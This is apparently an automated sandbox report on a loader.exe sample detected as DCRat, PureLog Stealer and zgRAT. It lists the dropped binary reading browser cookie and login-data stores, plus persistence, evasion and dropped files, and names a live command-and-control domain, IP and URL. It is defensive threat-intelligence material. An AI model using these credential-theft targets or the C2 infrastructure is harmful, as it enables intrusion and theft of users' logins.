                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000011.00000002.3435800974.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000002.2357344463.0000000012B88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: chainPorthostCommon.exe PID: 2308, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 6008, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: dasHost.exe PID: 3404, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: loader.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.loader.exe.5d2d70d.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.loader.exe.74d170d.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.chainPorthostCommon.exe.4b0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.loader.exe.5d2d70d.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.loader.exe.74d170d.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.2162490833.0000000005BE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2161189771.0000000007387000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000000.2286038382.00000000004B2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Windows\DiagTrack\Scenarios\dasHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Microsoft\csrss.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\conhost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: loader.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.loader.exe.5d2d70d.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.loader.exe.74d170d.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.chainPorthostCommon.exe.4b0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.loader.exe.5d2d70d.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.loader.exe.74d170d.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Windows\DiagTrack\Scenarios\dasHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Microsoft\csrss.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\conhost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts141
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		1
                                    Exploitation for Privilege Escalation                                    		1
                                    Disable or Modify Tools                                    		1
                                    OS Credential Dumping                                    		3
                                    File and Directory Discovery                                    		1
                                    Taint Shared Content                                    		1
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts2
                                    Command and Scripting Interpreter                                    		1
                                    DLL Side-Loading                                    		1
                                    DLL Side-Loading                                    		1
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory145
                                    System Information Discovery                                    		Remote Desktop Protocol1
                                    Data from Local System                                    		2
                                    Non-Application Layer Protocol                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain AccountsAt31
                                    Registry Run Keys / Startup Folder                                    		12
                                    Process Injection                                    		3
                                    Obfuscated Files or Information                                    		Security Account Manager541
                                    Security Software Discovery                                    		SMB/Windows Admin Shares1
                                    Clipboard Data                                    		12
                                    Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook31
                                    Registry Run Keys / Startup Folder                                    		14
                                    Software Packing                                    		NTDS2
                                    Process Discovery                                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading                                    		LSA Secrets471
                                    Virtualization/Sandbox Evasion                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                    File Deletion                                    		Cached Domain Credentials1
                                    Application Window Discovery                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items232
                                    Masquerading                                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job471
                                    Virtualization/Sandbox Evasion                                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                                    Process Injection                                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588885 Sample: loader.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 83 373292cm.nyashka.top 2->83 91 Suricata IDS alerts for network traffic 2->91 93 Found malware configuration 2->93 95 Antivirus detection for dropped file 2->95 97 15 other signatures 2->97 11 loader.exe 3 6 2->11         started        15 dasHost.exe 2->15         started        17 conhost.exe 2->17         started        19 5 other processes 2->19 signatures3 process4 file5 79 C:\...\chainPorthostCommon.exe, PE32 11->79 dropped 81 OAKCwEsKnudXsAgphV...q81GMNjCqOkwlC1.vbe, data 11->81 dropped 117 Detected unpacking (changes PE section rights) 11->117 119 Tries to detect sandboxes and other dynamic analysis tools (window names) 11->119 121 Hides threads from debuggers 11->121 21 wscript.exe 1 11->21         started        123 Antivirus detection for dropped file 15->123 125 Multi AV Scanner detection for dropped file 15->125 127 Machine Learning detection for dropped file 15->127 signatures6 process7 signatures8 99 Windows Scripting host queries suspicious COM object (likely to drop second stage) 21->99 24 cmd.exe 1 21->24         started        process9 process10 26 chainPorthostCommon.exe 14 34 24->26         started        30 conhost.exe 24->30         started        file11 71 C:\Windows\...\tQESKTdysPpsVzUyXTE.exe, PE32 26->71 dropped 73 C:\Windows\...\RuntimeBroker.exe, PE32 26->73 dropped 75 C:\Windows\DiagTrack\Scenarios\dasHost.exe, PE32 26->75 dropped 77 9 other malicious files 26->77 dropped 109 Antivirus detection for dropped file 26->109 111 Multi AV Scanner detection for dropped file 26->111 113 Creates an undocumented autostart registry key 26->113 115 4 other signatures 26->115 32 cmd.exe 1 26->32         started        35 csc.exe 4 26->35         started        38 csc.exe 4 26->38         started        signatures12 process13 file14 87 Drops executables to the windows directory (C:\Windows) and starts them 32->87 40 RuntimeBroker.exe 497 32->40         started        45 w32tm.exe 1 32->45         started        47 conhost.exe 32->47         started        49 chcp.com 1 32->49         started        59 C:\Windows\...\SecurityHealthSystray.exe, PE32 35->59 dropped 89 Infects executable files (exe, dll, sys, html) 35->89 51 conhost.exe 35->51         started        53 cvtres.exe 1 35->53         started        61 C:\Program Files (x86)\...\msedge.exe, PE32 38->61 dropped 55 conhost.exe 38->55         started        57 cvtres.exe 1 38->57         started        signatures15 process16 dnsIp17 85 373292cm.nyashka.top 37.44.238.250, 56905, 56915, 56921 HARMONYHOSTING-ASFR France 40->85 63 C:\Users\user\Desktop\pOvooSqL.log, PE32 40->63 dropped 65 C:\Users\user\Desktop\XCTiUwVw.log, PE32 40->65 dropped 67 C:\Users\user\Desktop\PHEbWhMM.log, PE32 40->67 dropped 69 2 other malicious files 40->69 dropped 101 Antivirus detection for dropped file 40->101 103 Multi AV Scanner detection for dropped file 40->103 105 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 40->105 107 3 other signatures 40->107 file18 signatures19

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    loader.exe76%VirustotalBrowse
                                    loader.exe68%ReversingLabsWin32.Trojan.DCRat
                                    loader.exe100%AviraVBS/Runner.VPG
                                    loader.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\Desktop\SSuSBQke.log100%AviraTR/AVI.Agent.updqb
                                    C:\Users\user\Desktop\JgiUHXBa.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Users\user\Desktop\pOvooSqL.log100%AviraTR/AVI.Agent.updqb
                                    C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe100%AviraVBS/Runner.VPG
                                    C:\Windows\DiagTrack\Scenarios\dasHost.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\HArqwkOZhw.bat100%AviraBAT/Delbat.C
                                    C:\Recovery\conhost.exe100%AviraHEUR/AGEN.1323342
                                    C:\ServerWinRuntimeBroker\chainPorthostCommon.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Microsoft\csrss.exe100%AviraHEUR/AGEN.1323342
                                    C:\Windows\LiveKernelReports\RuntimeBroker.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\keVXUmFt.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\JgiUHXBa.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\ZPhRdffT.log100%Joe Sandbox ML
                                    C:\Windows\System32\SecurityHealthSystray.exe100%Joe Sandbox ML
                                    C:\Windows\DiagTrack\Scenarios\dasHost.exe100%Joe Sandbox ML
                                    C:\Recovery\conhost.exe100%Joe Sandbox ML
                                    C:\ServerWinRuntimeBroker\chainPorthostCommon.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Microsoft\csrss.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\OTzTkTQO.log100%Joe Sandbox ML
                                    C:\Windows\LiveKernelReports\RuntimeBroker.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\keVXUmFt.log100%Joe Sandbox ML
                                    C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Microsoft\csrss.exe83%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                    C:\Recovery\conhost.exe83%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                    C:\ServerWinRuntimeBroker\chainPorthostCommon.exe83%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                    C:\Users\user\Desktop\BLdnhdFQ.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\JgiUHXBa.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\OTzTkTQO.log8%ReversingLabs
                                    C:\Users\user\Desktop\PHEbWhMM.log25%ReversingLabs
                                    C:\Users\user\Desktop\SSuSBQke.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\XCTiUwVw.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\ZPhRdffT.log8%ReversingLabs
                                    C:\Users\user\Desktop\keVXUmFt.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\kmFpzVgz.log25%ReversingLabs
                                    C:\Users\user\Desktop\pOvooSqL.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Windows\DiagTrack\Scenarios\dasHost.exe83%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                    C:\Windows\LiveKernelReports\RuntimeBroker.exe83%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                    C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe83%ReversingLabsByteCode-MSIL.Trojan.Whispergate

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    http://373292cm.nyP0%Avira URL Cloudsafe
                                    http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php0%Avira URL Cloudsafe
                                    http://373292cm.nyPR0%Avira URL Cloudsafe
                                    http://373292cm.nyashka.top0%Avira URL Cloudsafe
                                    http://373292cm.nyashka.top/0%Avira URL Cloudsafe

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    373292cm.nyashka.top
                                    		37.44.238.250
                                    		truetrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.phptrue
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
